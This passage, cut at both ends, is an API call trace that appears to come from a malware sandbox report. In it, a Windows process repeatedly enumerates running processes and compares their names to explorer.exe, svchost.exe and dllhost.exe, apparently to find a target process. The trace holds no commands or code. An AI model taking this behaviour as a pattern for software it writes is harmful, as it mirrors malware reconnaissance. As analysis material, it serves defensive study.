hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.807] CloseHandle (hObject=0xec) returned 1 [0223.807] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0223.807] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0223.807] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0223.807] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0223.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0223.808] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.808] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.808] CloseHandle (hObject=0xec) returned 1 [0223.808] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0223.808] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0223.808] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0223.808] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0223.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0223.809] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.809] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.809] CloseHandle (hObject=0xec) returned 1 [0223.809] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0223.809] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0223.809] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0223.809] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0223.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0223.809] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.809] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.809] CloseHandle (hObject=0xec) returned 1 [0223.809] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0223.809] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0223.809] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0223.810] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0223.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0223.810] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.810] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.810] CloseHandle (hObject=0xec) returned 1 [0223.810] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0223.810] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0223.810] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0223.810] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0223.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0223.811] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.811] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.811] CloseHandle (hObject=0xec) returned 1 [0223.811] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0223.811] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0223.811] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0223.811] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0223.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0223.811] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.811] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.811] CloseHandle (hObject=0xec) returned 1 [0223.812] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0223.812] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0223.812] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0223.812] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0223.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0223.812] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.812] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.812] CloseHandle (hObject=0xec) returned 1 [0223.812] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0223.812] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0223.812] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0223.812] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0223.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0223.813] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.813] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.813] CloseHandle (hObject=0xec) returned 1 [0223.813] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0223.813] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0223.813] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0223.813] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0223.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0223.813] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.814] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.814] CloseHandle (hObject=0xec) returned 1 [0223.814] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0223.814] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0223.814] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0223.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0223.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0223.814] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.814] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.814] CloseHandle (hObject=0xec) returned 1 [0223.814] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0223.814] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0223.814] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0223.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0223.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0223.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0223.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0223.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0223.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0223.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0223.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0223.817] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.817] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.817] CloseHandle (hObject=0xec) returned 1 [0223.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0223.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0223.818] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.818] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.818] CloseHandle (hObject=0xec) returned 1 [0223.818] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0223.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0223.819] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.819] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.819] CloseHandle (hObject=0xec) returned 1 [0223.819] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0223.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0223.820] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.820] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.820] CloseHandle (hObject=0xec) returned 1 [0223.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0223.821] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.821] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.821] CloseHandle (hObject=0xec) returned 1 [0223.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0223.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0223.821] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.822] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0223.822] CloseHandle (hObject=0xec) returned 1 [0223.822] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0223.822] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0223.822] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0223.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0223.822] CloseHandle (hObject=0xe8) returned 1 [0223.822] Sleep (dwMilliseconds=0x3e8) [0224.837] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0224.839] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0224.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0224.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0224.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0224.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0224.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0224.842] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0224.843] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0224.843] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0224.844] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0224.844] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0224.845] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0224.845] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0224.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0224.846] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0224.847] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0224.847] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0224.848] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.848] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0224.848] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0224.849] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.849] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.849] CloseHandle (hObject=0xec) returned 1 [0224.849] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0224.850] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0224.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0224.850] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.850] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0224.850] CloseHandle (hObject=0xec) returned 1 [0224.850] Process32Next (in: hSnapshot=0xe8, 